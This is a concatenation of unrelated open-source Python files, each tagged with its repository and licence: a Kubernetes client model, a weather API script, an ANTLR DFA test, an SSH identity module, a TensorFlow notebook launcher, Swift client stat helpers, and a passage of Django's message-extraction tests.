Selects the pods to which this NetworkPolicy object applies. The array of ingress rules is applied to any pods selected by this field. Multiple network policies can select the same set of pods. In this case, the ingress rules for each are combined additively. This field is NOT optional and follows standard label selector semantics. An empty podSelector matches all pods in this namespace.
:param pod_selector: The pod_selector of this V1beta1NetworkPolicySpec.
:type: V1LabelSelector
"""
if pod_selector is None:
raise ValueError("Invalid value for `pod_selector`, must not be `None`")
self._pod_selector = pod_selector
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1NetworkPolicySpec):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| apache-2.0 |
cragwen/hello-world | py/snippet-master/weather/weather_py3.py | 1 | 3282 | # -*- coding: utf-8 -*-
# windows 下如果出现编码问题,将 utf-8 改为 gbk
import urllib.request
import urllib.parse
import gzip
import json
from city import city
def get_weather_1(cityname):
print('\n接口 1:')
citycode = city.get(cityname)
if not citycode:
print('未找到该城市')
return
url = 'http://www.weather.com.cn/data/cityinfo/%s.html' % citycode
print(url)
resp = urllib.request.urlopen(url).read()
# print(resp)
# 将 json 格式的结果转为字典对象
result = json.loads(resp)
# print(result)
result_data = result.get('weatherinfo')
# print(result_data)
if result_data:
print('天气:', result_data.get('weather'))
print('最低温度:', result_data.get('temp1'))
print('最高温度:', result_data.get('temp2'))
else:
print('未能获取此城市的天气情况。')
def get_weather_2(cityname):
print('\n接口 2:')
citycode = city.get(cityname)
if not citycode:
print('未找到该城市')
return
url = 'http://wthrcdn.etouch.cn/weather_mini?citykey=%s' % citycode
print(url)
resp = urllib.request.urlopen(url).read()
# print(resp)
# 因网页内容做了 gzip 压缩,所以要对其解压
try:
data = gzip.decompress(resp)
except:
data = resp
# print(data)
# 将 json 格式的结果转为字典对象
result = json.loads(data)
# print(result)
result_data = result.get('data')
# print(result_data)
if result_data:
print('当前温度:', result_data.get('wendu'), '℃')
print('空气质量:', result_data.get('aqi'))
print(result_data.get('ganmao'))
print('天气预报:')
forecast = result_data.get('forecast')
for fc in forecast:
print(fc.get('date'), ':', fc.get('type'), ',', fc.get('low'), ',', fc.get('high'))
else:
print('未能获取此城市的天气情况。')
def get_weather_3(cityname):
print('\n接口 3:')
cityurl = urllib.parse.quote(cityname)
url = 'http://wthrcdn.etouch.cn/weather_mini?city=%s' % cityurl
print(url)
resp = urllib.request.urlopen(url).read()
# print(resp)
# 因网页内容做了 gzip 压缩,所以要对其解压
try:
data = gzip.decompress(resp)
except:
data = resp
# print(data)
# 将 json 格式的结果转为字典对象
result = json.loads(data)
# print(result)
result_data = result.get('data')
# print(result_data)
if result_data:
print('当前温度:', result_data.get('wendu'), '℃')
print('空气质量:', result_data.get('aqi'))
print(result_data.get('ganmao'))
print('天气预报:')
forecast = result_data.get('forecast')
for fc in forecast:
print(fc.get('date'), ':', fc.get('type'), ',', fc.get('low'), ',', fc.get('high'))
else:
print('未能获取此城市的天气情况。')
while True:
# 获取网页返回
cityname = input('请输入要查询的城市(直接回车退出):\n')
if not cityname:
break
get_weather_1(cityname)
get_weather_2(cityname)
get_weather_3(cityname)
| unlicense |
techstormteam/12-vision-connect-ios-linphone | submodules/externals/antlr3/runtime/Python/unittests/testdfa.py | 16 | 1537 |
import unittest
import antlr3
class TestDFA(unittest.TestCase):
"""Test case for the DFA class."""
def setUp(self):
"""Setup test fixure.
We need a Recognizer in order to instanciate a DFA.
"""
class TRecognizer(antlr3.BaseRecognizer):
api_version = 'HEAD'
self.recog = TRecognizer()
def testInit(self):
"""DFA.__init__()
Just a smoke test.
"""
dfa = antlr3.DFA(
self.recog, 1,
eot=[],
eof=[],
min=[],
max=[],
accept=[],
special=[],
transition=[]
)
def testUnpack(self):
"""DFA.unpack()"""
self.failUnlessEqual(
antlr3.DFA.unpack(
u"\1\3\1\4\2\uffff\1\5\22\uffff\1\2\31\uffff\1\6\6\uffff"
u"\32\6\4\uffff\1\6\1\uffff\32\6"
),
[ 3, 4, -1, -1, 5, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, 2, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
6, -1, -1, -1, -1, -1, -1, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6,
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, -1, -1, -1, -1, 6, -1,
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6,
6, 6, 6, 6, 6
]
)
if __name__ == "__main__":
unittest.main(testRunner=unittest.TextTestRunner(verbosity=2))
| gpl-2.0 |
tehmaze-labs/lollipop | lollipop/identity.py | 1 | 5101 | import codecs
import hashlib
import logging
import os
from . import security
from .key import Key, DSA, ECDSA, RSA, load_der
from .buffer import Buffer
logger = logging.getLogger(__name__)
class Identity:
type = None
marker = (
b'-----BEGIN ',
b' PRIVATE KEY-----',
)
def __init__(self, key, comment=None, provider=None, death=None):
self.key = key
self.comment = comment
self.provider = provider
self.death = death
logger.info('loaded identity {!r}'.format(self))
def __repr__(self):
return '<{} fingerprint={} comment={}>'.format(
self.__class__.__name__,
self.key.fingerprint,
self.comment,
)
@classmethod
def from_blob(cls, blob):
data = dict(
key = Key.from_blob(blob),
)
print('remain', blob)
try:
data['comment'] = str(blob.pop_str(), 'ascii')
except IndexError:
pass
print('new key', data)
return cls.from_key(**data)
@classmethod
def from_key(cls, key, **kwargs):
if isinstance(key, DSA):
return DSAIdentity(key, **kwargs)
elif isinstance(key, ECDSA):
return ECDSAIdentity(key, **kwargs)
elif isinstance(key, RSA):
return RSAIdentity(key, **kwargs)
else:
return None
@classmethod
def from_keyfile(cls, filename, password=None):
filename = os.path.abspath(filename)
if cls is Identity:
with open(filename, 'rb') as file:
kind = None
for line in file:
line = line.strip()
if line.startswith(cls.marker[0]) and \
line.endswith(cls.marker[1]):
kind = line[len(cls.marker[0]):-len(cls.marker[1])]
kind = str(kind, 'ascii').strip()
break
if kind is None:
raise TypeError("Can't determine key type for {}".format(
filename,
))
file.seek(0)
for subclass in Identity.__subclasses__():
if subclass.type.__name__ == kind:
return subclass.from_str(
file.read(),
password=password,
comment=filename,
)
raise TypeError('Unsupported key type "{}"'.format(kind))
else:
logger.info('loading {} identity from keyfile {}'.format(
self.__class__.__name__,
filename,
))
with open(filename, 'rb') as file:
return cls.from_str(file.read())
@classmethod
def from_str(cls, data, password=None, comment=None):
return cls(
key=cls.type.from_pem(data, password=password),
comment=comment,
)
class DSAIdentity(Identity):
type = DSA
class ECDSAIdentity(Identity):
type = ECDSA
class RSAIdentity(Identity):
type = RSA
def sign(self, data):
output = Buffer()
output.put_str('ssh-rsa')
output.extend(self.key.sign(data, hashlib.sha1))
return output
class Identities:
def __init__(self):
self.identities = []
def __contains__(self, item):
if isinstance(item, Key):
for identity in self.identities:
if identity.key == item:
return True
return False
elif isinstance(item, Identity):
return item in self.identities
else:
raise ValueError(item)
def __getitem__(self, key):
for identity in self.identities:
if identity.key == key:
return identity
def __iter__(self):
self.__cursor__ = -1
return self
def __next__(self):
self.__cursor__ += 1
if self.__cursor__ >= len(self.identities):
raise StopIteration()
else:
return self.identities[self.__cursor__]
def __len__(self):
return len(self.identities)
def add(self, identity):
self.identities.append(identity)
def add_dsa_keyfile(self, filename, password=None):
self.add(DSAIdentity.from_keyfile(filename, password=password))
def add_ecdsa_keyfile(self, filename, password=None):
self.add(ECDSAIdentity.from_keyfile(filename, password=password))
def add_rsa_keyfile(self, filename, password=None):
self.add(RSAIdentity.from_keyfile(filename, password=password))
def remove(self, identity):
logger.info('removing identity {}'.format(identity))
if identity in self.identities:
self.identities.remove(identity)
del identity.key
del identity
security.gc()
def remove_key(self, key):
for identity in self.identities:
if identity.key == key:
self.remove(identity)
| mit |
adit-chandra/tensorflow | tensorflow/python/client/notebook.py | 61 | 4779 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Notebook front-end to TensorFlow.
When you run this binary, you'll see something like below, which indicates
the serving URL of the notebook:
The IPython Notebook is running at: http://127.0.0.1:8888/
Press "Shift+Enter" to execute a cell
Press "Enter" on a cell to go into edit mode.
Press "Escape" to go back into command mode and use arrow keys to navigate.
Press "a" in command mode to insert cell above or "b" to insert cell below.
Your root notebooks directory is FLAGS.notebook_dir
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import socket
import sys
from tensorflow.python.platform import app
# pylint: disable=g-import-not-at-top
# Official recommended way of turning on fast protocol buffers as of 10/21/14
os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION"] = "cpp"
os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION_VERSION"] = "2"
FLAGS = None
ORIG_ARGV = sys.argv
# Main notebook process calls itself with argv[1]="kernel" to start kernel
# subprocesses.
IS_KERNEL = len(sys.argv) > 1 and sys.argv[1] == "kernel"
def main(unused_argv):
sys.argv = ORIG_ARGV
if not IS_KERNEL:
# Drop all flags.
sys.argv = [sys.argv[0]]
# NOTE(sadovsky): For some reason, putting this import at the top level
# breaks inline plotting. It's probably a bug in the stone-age version of
# matplotlib.
from IPython.html.notebookapp import NotebookApp # pylint: disable=g-import-not-at-top
notebookapp = NotebookApp.instance()
notebookapp.open_browser = True
# password functionality adopted from quality/ranklab/main/tools/notebook.py
# add options to run with "password"
if FLAGS.password:
from IPython.lib import passwd # pylint: disable=g-import-not-at-top
notebookapp.ip = "0.0.0.0"
notebookapp.password = passwd(FLAGS.password)
else:
print("\nNo password specified; Notebook server will only be available"
" on the local machine.\n")
notebookapp.initialize(argv=["--notebook-dir", FLAGS.notebook_dir])
if notebookapp.ip == "0.0.0.0":
proto = "https" if notebookapp.certfile else "http"
url = "%s://%s:%d%s" % (proto, socket.gethostname(), notebookapp.port,
notebookapp.base_project_url)
print("\nNotebook server will be publicly available at: %s\n" % url)
notebookapp.start()
return
# Drop the --flagfile flag so that notebook doesn't complain about an
# "unrecognized alias" when parsing sys.argv.
sys.argv = ([sys.argv[0]] +
[z for z in sys.argv[1:] if not z.startswith("--flagfile")])
from IPython.kernel.zmq.kernelapp import IPKernelApp # pylint: disable=g-import-not-at-top
kernelapp = IPKernelApp.instance()
kernelapp.initialize()
# Enable inline plotting. Equivalent to running "%matplotlib inline".
ipshell = kernelapp.shell
ipshell.enable_matplotlib("inline")
kernelapp.start()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--password",
type=str,
default=None,
help="""\
Password to require. If set, the server will allow public access. Only
used if notebook config file does not exist.\
""")
parser.add_argument(
"--notebook_dir",
type=str,
default="experimental/brain/notebooks",
help="root location where to store notebooks")
# When the user starts the main notebook process, we don't touch sys.argv.
# When the main process launches kernel subprocesses, it writes all flags
# to a tmpfile and sets --flagfile to that tmpfile, so for kernel
# subprocesses here we drop all flags *except* --flagfile, then call
# app.run(), and then (in main) restore all flags before starting the
# kernel app.
if IS_KERNEL:
# Drop everything except --flagfile.
sys.argv = (
[sys.argv[0]] + [x for x in sys.argv[1:] if x.startswith("--flagfile")])
FLAGS, unparsed = parser.parse_known_args()
app.run(main=main, argv=[sys.argv[0]] + unparsed)
| apache-2.0 |
openstack/python-swiftclient | swiftclient/command_helpers.py | 1 | 7094 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from swiftclient.utils import prt_bytes, split_request_headers
POLICY_HEADER_PREFIX = 'x-account-storage-policy-'
def stat_account(conn, options):
items = []
req_headers = split_request_headers(options.get('header', []))
headers = conn.head_account(headers=req_headers)
if options['verbose'] > 1:
items.extend([
('StorageURL', conn.url),
('Auth Token', conn.token),
])
container_count = int(headers.get('x-account-container-count', 0))
object_count = prt_bytes(headers.get('x-account-object-count', 0),
options['human']).lstrip()
bytes_used = prt_bytes(headers.get('x-account-bytes-used', 0),
options['human']).lstrip()
items.extend([
('Account', conn.url.rsplit('/', 1)[-1]),
('Containers', container_count),
('Objects', object_count),
('Bytes', bytes_used),
])
policies = set()
for header_key, header_value in headers.items():
if header_key.lower().startswith(POLICY_HEADER_PREFIX):
policy_name = header_key.rsplit('-', 2)[0].split('-', 4)[-1]
policies.add(policy_name)
for policy in policies:
container_count_header = (POLICY_HEADER_PREFIX + policy +
'-container-count')
if container_count_header in headers:
items.append(
('Containers in policy "' + policy + '"',
prt_bytes(headers[container_count_header],
options['human']).lstrip())
)
items.extend((
('Objects in policy "' + policy + '"',
prt_bytes(
headers.get(
POLICY_HEADER_PREFIX + policy + '-object-count', 0),
options['human']
).lstrip()),
('Bytes in policy "' + policy + '"',
prt_bytes(
headers.get(
POLICY_HEADER_PREFIX + policy + '-bytes-used', 0),
options['human']
).lstrip()),
))
return items, headers
def print_account_stats(items, headers, output_manager):
exclude_policy_headers = []
for header_key, header_value in headers.items():
if header_key.lower().startswith(POLICY_HEADER_PREFIX):
exclude_policy_headers.append(header_key)
items.extend(headers_to_items(
headers, meta_prefix='x-account-meta-',
exclude_headers=([
'content-length', 'date',
'x-account-container-count',
'x-account-object-count',
'x-account-bytes-used'] + exclude_policy_headers)))
# line up the items nicely
offset = max(len(item) for item, value in items)
output_manager.print_items(items, offset=offset)
def stat_container(conn, options, container):
req_headers = split_request_headers(options.get('header', []))
headers = conn.head_container(container, headers=req_headers)
items = []
if options['verbose'] > 1:
path = '%s/%s' % (conn.url, container)
items.extend([
('URL', path),
('Auth Token', conn.token)
])
object_count = prt_bytes(
headers.get('x-container-object-count', 0),
options['human']).lstrip()
bytes_used = prt_bytes(headers.get('x-container-bytes-used', 0),
options['human']).lstrip()
items.extend([
('Account', conn.url.rsplit('/', 1)[-1]),
('Container', container),
('Objects', object_count),
('Bytes', bytes_used),
('Read ACL', headers.get('x-container-read', '')),
('Write ACL', headers.get('x-container-write', '')),
('Sync To', headers.get('x-container-sync-to', '')),
('Sync Key', headers.get('x-container-sync-key', ''))
])
return items, headers
def print_container_stats(items, headers, output_manager):
items.extend(headers_to_items(
headers,
meta_prefix='x-container-meta-',
exclude_headers=(
'content-length', 'date',
'x-container-object-count',
'x-container-bytes-used',
'x-container-read',
'x-container-write',
'x-container-sync-to',
'x-container-sync-key'
)
))
# line up the items nicely
offset = max(len(item) for item, value in items)
output_manager.print_items(items, offset=offset)
def stat_object(conn, options, container, obj):
req_headers = split_request_headers(options.get('header', []))
query_string = None
if options.get('version_id') is not None:
query_string = 'version-id=%s' % options['version_id']
headers = conn.head_object(container, obj, headers=req_headers,
query_string=query_string)
items = []
if options['verbose'] > 1:
path = '%s/%s/%s' % (conn.url, container, obj)
items.extend([
('URL', path),
('Auth Token', conn.token)
])
content_length = prt_bytes(headers.get('content-length', 0),
options['human']).lstrip()
items.extend([
('Account', conn.url.rsplit('/', 1)[-1]),
('Container', container),
('Object', obj),
('Content Type', headers.get('content-type')),
('Content Length', content_length),
('Last Modified', headers.get('last-modified')),
('ETag', headers.get('etag')),
('Manifest', headers.get('x-object-manifest'))
])
return items, headers
def print_object_stats(items, headers, output_manager):
items.extend(headers_to_items(
headers,
meta_prefix='x-object-meta-',
exclude_headers=(
'content-type', 'content-length',
'last-modified', 'etag', 'date',
'x-object-manifest')
))
# line up the items nicely
offset = max(len(item) for item, value in items)
output_manager.print_items(items, offset=offset, skip_missing=True)
def headers_to_items(headers, meta_prefix='', exclude_headers=None):
exclude_headers = exclude_headers or []
other_items = []
meta_items = []
for key, value in headers.items():
if key not in exclude_headers:
if key.startswith(meta_prefix):
meta_key = 'Meta %s' % key[len(meta_prefix):].title()
meta_items.append((meta_key, value))
else:
other_items.append((key.title(), value))
return meta_items + other_items
| apache-2.0 |
coldmind/django | tests/i18n/test_extraction.py | 117 | 35075 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import io
import os
import re
import shutil
import time
import warnings
from unittest import SkipTest, skipUnless
from django.conf import settings
from django.core import management
from django.core.management import execute_from_command_line
from django.core.management.base import CommandError
from django.core.management.commands.makemessages import \
Command as MakeMessagesCommand
from django.core.management.utils import find_command
from django.test import SimpleTestCase, mock, override_settings
from django.test.utils import captured_stderr, captured_stdout
from django.utils import six
from django.utils._os import upath
from django.utils.encoding import force_text
from django.utils.six import StringIO
from django.utils.translation import TranslatorCommentWarning
LOCALE = 'de'
has_xgettext = find_command('xgettext')
this_directory = os.path.dirname(upath(__file__))
@skipUnless(has_xgettext, 'xgettext is mandatory for extraction tests')
class ExtractorTests(SimpleTestCase):
test_dir = os.path.abspath(os.path.join(this_directory, 'commands'))
PO_FILE = 'locale/%s/LC_MESSAGES/django.po' % LOCALE
def setUp(self):
self._cwd = os.getcwd()
def _rmrf(self, dname):
if os.path.commonprefix([self.test_dir, os.path.abspath(dname)]) != self.test_dir:
return
shutil.rmtree(dname)
def rmfile(self, filepath):
if os.path.exists(filepath):
os.remove(filepath)
def tearDown(self):
os.chdir(self.test_dir)
try:
self._rmrf('locale/%s' % LOCALE)
except OSError:
pass
os.chdir(self._cwd)
def _run_makemessages(self, **options):
os.chdir(self.test_dir)
out = StringIO()
management.call_command('makemessages', locale=[LOCALE], verbosity=2,
stdout=out, **options)
output = out.getvalue()
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = fp.read()
return output, po_contents
def _assertPoKeyword(self, keyword, expected_value, haystack, use_quotes=True):
q = '"'
if use_quotes:
expected_value = '"%s"' % expected_value
q = "'"
needle = '%s %s' % (keyword, expected_value)
expected_value = re.escape(expected_value)
return self.assertTrue(re.search('^%s %s' % (keyword, expected_value), haystack, re.MULTILINE),
'Could not find %(q)s%(n)s%(q)s in generated PO file' % {'n': needle, 'q': q})
def assertMsgId(self, msgid, haystack, use_quotes=True):
return self._assertPoKeyword('msgid', msgid, haystack, use_quotes=use_quotes)
def assertMsgStr(self, msgstr, haystack, use_quotes=True):
return self._assertPoKeyword('msgstr', msgstr, haystack, use_quotes=use_quotes)
def assertNotMsgId(self, msgid, s, use_quotes=True):
if use_quotes:
msgid = '"%s"' % msgid
msgid = re.escape(msgid)
return self.assertTrue(not re.search('^msgid %s' % msgid, s, re.MULTILINE))
def _assertPoLocComment(self, assert_presence, po_filename, line_number, *comment_parts):
with open(po_filename, 'r') as fp:
po_contents = force_text(fp.read())
if os.name == 'nt':
# #: .\path\to\file.html:123
cwd_prefix = '%s%s' % (os.curdir, os.sep)
else:
# #: path/to/file.html:123
cwd_prefix = ''
parts = ['#: ']
parts.append(os.path.join(cwd_prefix, *comment_parts))
if line_number is not None:
parts.append(':%d' % line_number)
needle = ''.join(parts)
if assert_presence:
return self.assertIn(needle, po_contents, '"%s" not found in final .po file.' % needle)
else:
return self.assertNotIn(needle, po_contents, '"%s" shouldn\'t be in final .po file.' % needle)
def assertLocationCommentPresent(self, po_filename, line_number, *comment_parts):
"""
self.assertLocationCommentPresent('django.po', 42, 'dirA', 'dirB', 'foo.py')
verifies that the django.po file has a gettext-style location comment of the form
`#: dirA/dirB/foo.py:42`
(or `#: .\dirA\dirB\foo.py:42` on Windows)
None can be passed for the line_number argument to skip checking of the :42 suffix part.
"""
return self._assertPoLocComment(True, po_filename, line_number, *comment_parts)
def assertLocationCommentNotPresent(self, po_filename, line_number, *comment_parts):
"""Check the opposite of assertLocationComment()"""
return self._assertPoLocComment(False, po_filename, line_number, *comment_parts)
def assertRecentlyModified(self, path):
"""
Assert that file was recently modified (modification time was less than 10 seconds ago).
"""
delta = time.time() - os.stat(path).st_mtime
self.assertLess(delta, 10, "%s was recently modified" % path)
def assertNotRecentlyModified(self, path):
"""
Assert that file was not recently modified (modification time was more than 10 seconds ago).
"""
delta = time.time() - os.stat(path).st_mtime
self.assertGreater(delta, 10, "%s wasn't recently modified" % path)
class BasicExtractorTests(ExtractorTests):
def test_comments_extractor(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with io.open(self.PO_FILE, 'r', encoding='utf-8') as fp:
po_contents = fp.read()
self.assertIn('#. Translators: This comment should be extracted', po_contents)
self.assertNotIn('This comment should not be extracted', po_contents)
# Comments in templates
self.assertIn('#. Translators: Django template comment for translators', po_contents)
self.assertIn("#. Translators: Django comment block for translators\n#. string's meaning unveiled", po_contents)
self.assertIn('#. Translators: One-line translator comment #1', po_contents)
self.assertIn('#. Translators: Two-line translator comment #1\n#. continued here.', po_contents)
self.assertIn('#. Translators: One-line translator comment #2', po_contents)
self.assertIn('#. Translators: Two-line translator comment #2\n#. continued here.', po_contents)
self.assertIn('#. Translators: One-line translator comment #3', po_contents)
self.assertIn('#. Translators: Two-line translator comment #3\n#. continued here.', po_contents)
self.assertIn('#. Translators: One-line translator comment #4', po_contents)
self.assertIn('#. Translators: Two-line translator comment #4\n#. continued here.', po_contents)
self.assertIn('#. Translators: One-line translator comment #5 -- with non ASCII characters: áéíóúö', po_contents)
self.assertIn('#. Translators: Two-line translator comment #5 -- with non ASCII characters: áéíóúö\n#. continued here.', po_contents)
def test_templatize_trans_tag(self):
# ticket #11240
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('Literal with a percent symbol at the end %%', po_contents)
self.assertMsgId('Literal with a percent %% symbol in the middle', po_contents)
self.assertMsgId('Completed 50%% of all the tasks', po_contents)
self.assertMsgId('Completed 99%% of all the tasks', po_contents)
self.assertMsgId("Shouldn't double escape this sequence: %% (two percent signs)", po_contents)
self.assertMsgId("Shouldn't double escape this sequence %% either", po_contents)
self.assertMsgId("Looks like a str fmt spec %%s but shouldn't be interpreted as such", po_contents)
self.assertMsgId("Looks like a str fmt spec %% o but shouldn't be interpreted as such", po_contents)
def test_templatize_blocktrans_tag(self):
# ticket #11966
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('I think that 100%% is more that 50%% of anything.', po_contents)
self.assertMsgId('I think that 100%% is more that 50%% of %(obj)s.', po_contents)
self.assertMsgId("Blocktrans extraction shouldn't double escape this: %%, a=%(a)s", po_contents)
def test_blocktrans_trimmed(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# should not be trimmed
self.assertNotMsgId('Text with a few line breaks.', po_contents)
# should be trimmed
self.assertMsgId("Again some text with a few line breaks, this time should be trimmed.", po_contents)
# #21406 -- Should adjust for eaten line numbers
self.assertMsgId("I'm on line 97", po_contents)
self.assertLocationCommentPresent(self.PO_FILE, 97, 'templates', 'test.html')
def test_force_en_us_locale(self):
"""Value of locale-munging option used by the command is the right one"""
self.assertTrue(MakeMessagesCommand.leave_locale_alone)
def test_extraction_error(self):
os.chdir(self.test_dir)
self.assertRaises(SyntaxError, management.call_command, 'makemessages', locale=[LOCALE], extensions=['tpl'], verbosity=0)
with self.assertRaises(SyntaxError) as context_manager:
management.call_command('makemessages', locale=[LOCALE], extensions=['tpl'], verbosity=0)
six.assertRegex(
self, str(context_manager.exception),
r'Translation blocks must not include other block tags: blocktrans \(file templates[/\\]template_with_error\.tpl, line 3\)'
)
# Check that the temporary file was cleaned up
self.assertFalse(os.path.exists('./templates/template_with_error.tpl.py'))
def test_unicode_decode_error(self):
os.chdir(self.test_dir)
shutil.copyfile('./not_utf8.sample', './not_utf8.txt')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'not_utf8.txt'))
out = StringIO()
management.call_command('makemessages', locale=[LOCALE], stdout=out)
self.assertIn("UnicodeDecodeError: skipped file not_utf8.txt in .",
force_text(out.getvalue()))
def test_extraction_warning(self):
"""test xgettext warning about multiple bare interpolation placeholders"""
os.chdir(self.test_dir)
shutil.copyfile('./code.sample', './code_sample.py')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'code_sample.py'))
out = StringIO()
management.call_command('makemessages', locale=[LOCALE], stdout=out)
self.assertIn("code_sample.py:4", force_text(out.getvalue()))
def test_template_message_context_extractor(self):
"""
Ensure that message contexts are correctly extracted for the
{% trans %} and {% blocktrans %} template tags.
Refs #14806.
"""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# {% trans %}
self.assertIn('msgctxt "Special trans context #1"', po_contents)
self.assertMsgId("Translatable literal #7a", po_contents)
self.assertIn('msgctxt "Special trans context #2"', po_contents)
self.assertMsgId("Translatable literal #7b", po_contents)
self.assertIn('msgctxt "Special trans context #3"', po_contents)
self.assertMsgId("Translatable literal #7c", po_contents)
# {% blocktrans %}
self.assertIn('msgctxt "Special blocktrans context #1"', po_contents)
self.assertMsgId("Translatable literal #8a", po_contents)
self.assertIn('msgctxt "Special blocktrans context #2"', po_contents)
self.assertMsgId("Translatable literal #8b-singular", po_contents)
self.assertIn("Translatable literal #8b-plural", po_contents)
self.assertIn('msgctxt "Special blocktrans context #3"', po_contents)
self.assertMsgId("Translatable literal #8c-singular", po_contents)
self.assertIn("Translatable literal #8c-plural", po_contents)
self.assertIn('msgctxt "Special blocktrans context #4"', po_contents)
self.assertMsgId("Translatable literal #8d %(a)s", po_contents)
def test_context_in_single_quotes(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# {% trans %}
self.assertIn('msgctxt "Context wrapped in double quotes"', po_contents)
self.assertIn('msgctxt "Context wrapped in single quotes"', po_contents)
# {% blocktrans %}
self.assertIn('msgctxt "Special blocktrans context wrapped in double quotes"', po_contents)
self.assertIn('msgctxt "Special blocktrans context wrapped in single quotes"', po_contents)
def test_template_comments(self):
"""Template comment tags on the same line of other constructs (#19552)"""
os.chdir(self.test_dir)
# Test detection/end user reporting of old, incorrect templates
# translator comments syntax
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter('always')
management.call_command('makemessages', locale=[LOCALE], extensions=['thtml'], verbosity=0)
self.assertEqual(len(ws), 3)
for w in ws:
self.assertTrue(issubclass(w.category, TranslatorCommentWarning))
six.assertRegex(
self, str(ws[0].message),
r"The translator-targeted comment 'Translators: ignored i18n comment #1' \(file templates[/\\]comments.thtml, line 4\) was ignored, because it wasn't the last item on the line\."
)
six.assertRegex(
self, str(ws[1].message),
r"The translator-targeted comment 'Translators: ignored i18n comment #3' \(file templates[/\\]comments.thtml, line 6\) was ignored, because it wasn't the last item on the line\."
)
six.assertRegex(
self, str(ws[2].message),
r"The translator-targeted comment 'Translators: ignored i18n comment #4' \(file templates[/\\]comments.thtml, line 8\) was ignored, because it wasn't the last item on the line\."
)
# Now test .po file contents
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('Translatable literal #9a', po_contents)
self.assertNotIn('ignored comment #1', po_contents)
self.assertNotIn('Translators: ignored i18n comment #1', po_contents)
self.assertMsgId("Translatable literal #9b", po_contents)
self.assertNotIn('ignored i18n comment #2', po_contents)
self.assertNotIn('ignored comment #2', po_contents)
self.assertMsgId('Translatable literal #9c', po_contents)
self.assertNotIn('ignored comment #3', po_contents)
self.assertNotIn('ignored i18n comment #3', po_contents)
self.assertMsgId('Translatable literal #9d', po_contents)
self.assertNotIn('ignored comment #4', po_contents)
self.assertMsgId('Translatable literal #9e', po_contents)
self.assertNotIn('ignored comment #5', po_contents)
self.assertNotIn('ignored i18n comment #4', po_contents)
self.assertMsgId('Translatable literal #9f', po_contents)
self.assertIn('#. Translators: valid i18n comment #5', po_contents)
self.assertMsgId('Translatable literal #9g', po_contents)
self.assertIn('#. Translators: valid i18n comment #6', po_contents)
self.assertMsgId('Translatable literal #9h', po_contents)
self.assertIn('#. Translators: valid i18n comment #7', po_contents)
self.assertMsgId('Translatable literal #9i', po_contents)
six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #8')
